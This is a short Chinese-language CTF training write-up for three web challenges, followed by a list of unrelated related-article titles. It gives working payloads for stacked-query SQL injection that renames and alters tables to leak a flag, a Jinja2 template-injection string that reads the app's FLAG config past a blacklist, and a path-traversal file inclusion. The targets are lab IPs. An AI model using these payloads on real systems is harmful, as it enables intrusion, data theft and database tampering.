Web2
输入’发现语法错误


输入’#显示正常,存在sql注入

order by
order by 2正常,order by 3出现错误,所以只有两个字段

联合查询,发现一些关键字被过滤

查询数据库
1’;show databases;#

查询表
1’;show table;#

查看表,发现flag在1919810931114514中
1?inject=1’ and 1=2; desc 1919810931114514;#

1?inject=1’ and 1=2; desc words;#

因为默认回显的是words表,将1919810931114514设置为默认回显的表
http://172.22.57.11:28525/?inject=1’ or 1=1; rename tables words to words1;rename tables 1919810931114514 to words;alter table words change flag id varchar(100);–+

Web3

打开后发现是一串不规则代码,按ctrl+u查看源代码

尝试注入构造payload
/shrine/{{2*3}}

因为源代码中,将小括号替换并将config和self加入黑名单,所以构造payload
{{get_flashed_messages.globals[‘current_app’].config[‘FLAG’]}}
得到flag

Web6

打开看到是一张图片。查看源代码,提示source.php,打开

查看代码,发现hint.php,打开,提示flag

输入http://172.22.57.11:28194/?file=source.php?/…/…/…/…/ffffllllaaaagggg
出现flag
ps:原理基本都不懂,那些payload都是网上找的。

wp 一次简单的攻防训练相关推荐

  1. NCTF 南京邮电大学网络攻防训练平台 WriteUp

    NCTF 南京邮电大学网络攻防训练平台 WriteUp 不说什么直接上题解 WEB 1.签到题(50) 直接查看网页源码 Flag:nctf{flag_admiaanaaaaaaaaaaa} 2.md ...

  2. 南京邮电大学网络攻防训练平台(NCTF)-异性相吸-Writeup

    南京邮电大学网络攻防训练平台(NCTF)-异性相吸-Writeup 题目描述 文件下载地址 很明显,文件之间进行亦或就可得到flag,不再多说,直接上脚本 1 #coding:utf-8 2 file ...

  3. python自训练神经网络_tensorflow学习笔记之简单的神经网络训练和测试

    本文实例为大家分享了用简单的神经网络来训练和测试的具体代码,供大家参考,具体内容如下 刚开始学习tf时,我们从简单的地方开始.卷积神经网络(CNN)是由简单的神经网络(NN)发展而来的,因此,我们的第 ...

  4. Tesseract-OCR的简单使用与训练

    Tesseract-OCR的简单使用与训练 Tesseract,一款由HP实验室开发由Google维护的开源OCR(Optical Character Recognition , 光学字符识别)引擎, ...

  5. 用最简单的方式训练史上最强ResNet-50,性能超过魔改结构的ResNeSt

    近日,CMU 的研究人员在 arXiv 上放出了一份技术报告,介绍他们如何通过蒸馏(distillation)训练一个强大的小模型.所提出方法使用相同模型结构和输入图片大小的前提下,在 ImageNe ...

  6. 超简单的pyTorch训练-onnx模型-C++ OpenCV DNN推理(附源码地址)

    学更好的别人, 做更好的自己. --<微卡智享> 本文长度为1974字,预计阅读5分钟 前言 很早就想学习深度学习了,因为平时都是自学,业余时间也有限,看过几个pyTorch的入门,都是一 ...

  7. tesseract 训练入门--记一次50张简单验证码的训练过程

    省略各种tesseract和各种包的安装,默认有python基础 需要有java环境以便操作训练工具jTessboxeditor,jdk和训练辅助工具的安装此处不讨论. 本人使用ubuntu18.04 ...

  8. CTF writeup 2_南邮网络攻防训练

    地址 地址 WEB 签到题 这一定是最简单的 传送门:http://chinalover.sinaapp.com/web1/ "key在哪里? " 在源码里~ md5 collis ...

  9. 神经网络变成小怪兽,还能互相 battle!这款游戏用最简单的方式训练神经网络...

    机器之心报道 编辑:魔王 在游戏里训练「神经网络小怪兽」,学习强化学习! 想了解神经网络,但不知道如何入手?教程太枯燥,论文不好懂? 别怕,这里有款多人在线战术竞技游戏(MOBA),让你在西部牛仔的世 ...

  10. Python简单99例-训练每天

    1-题目:有1.2.3.4个数字,能组成多少个互不相同且无重复数字的三位数?都是多少 for i in range(1,5):for j in range(1,5):for k in range(1, ...

最新文章

  1. 海思3559A上编译FFmpeg源码操作步骤
  2. mysql5.5.42指定数据库同步操作
  3. springboot 添加拦截器之后中文乱码_springboot中配置了拦截器后,拦截器无效的解决方案之一...
  4. 数据仓库—stg层_手把手教你创建BI数据仓库STG层
  5. 在此iphone上尚未受信任_电脑显示服务器上的安全数据库没有此工作站信任关系的解决方法...
  6. jQuery 教程01——jQuery安装
  7. pmos管的应用_串联稳压电路3:NMOS型、PMOS型
  8. 链表反转的两种实现方法,后一种击败了100%的用户
  9. C++ 将模板申明为友元
  10. openCV实践项目:图片文本检测
  11. 通过精读一本英文技术书籍搞定英语
  12. mac虚拟摄像头插件_【OBS虚拟摄像头插件下载】OBS VirtualCam(OBS虚拟摄像头插件) v2.0.5 官方最新版-开心电玩...
  13. RDL和RDLC性能比较
  14. Kicad改主题 层颜色 (护眼黑底 层颜色类似立创EDA 或者Altium Designer)
  15. 为什么加泪滴,Allegro如何加泪滴?
  16. hdu 5418 Victor and World (floyd+状压dp)
  17. 软件架构设计分层模型和构图思考
  18. 积分兑换选什么礼品,值得企业去思考!
  19. 华为计算机单位换算在哪里,单位换算
  20. Ubuntu 21.04 使用Docker部署深度学习项目(cuda11.2+cudnn8.8+deepface)

热门文章

  1. python学习笔记 程序执行过程 基本数据类型
  2. Atitit 音频资源管理法 与教程 音频资源分类法 卡拉ok功能 人声消除给你教程 Atitit 音频功能常见工具与类库 Atitit 调整播放速率 Atitit、 ffmpeg录音 atit
  3. Atitit 获取mp3音乐文件的音乐名与歌手结构化元数据 nlp java 目录 1.1. 一、MP3文件的元数据 1 1.2. MP3文件的数据结构以及为mp3内嵌歌词的代码 3 1.3.
  4. Atitit 图像处理之编程之类库调用的接口api cli gui ws rest attilax大总结.docx
  5. Atitit ati licenseService    设计原理
  6. atitit.无线网卡 不能搜索到WiFi 无线路由信号的解决不能上网
  7. PAIP.DB4O与SQL配合使用在海量数据下.txt
  8. 平安资管罗水权:建设债券投资的智慧中台
  9. 推荐:年度巨献:《Ubuntu桌面生存指南》(作者:ghosert)
  10. ECS 云助手,实现云上运维自动化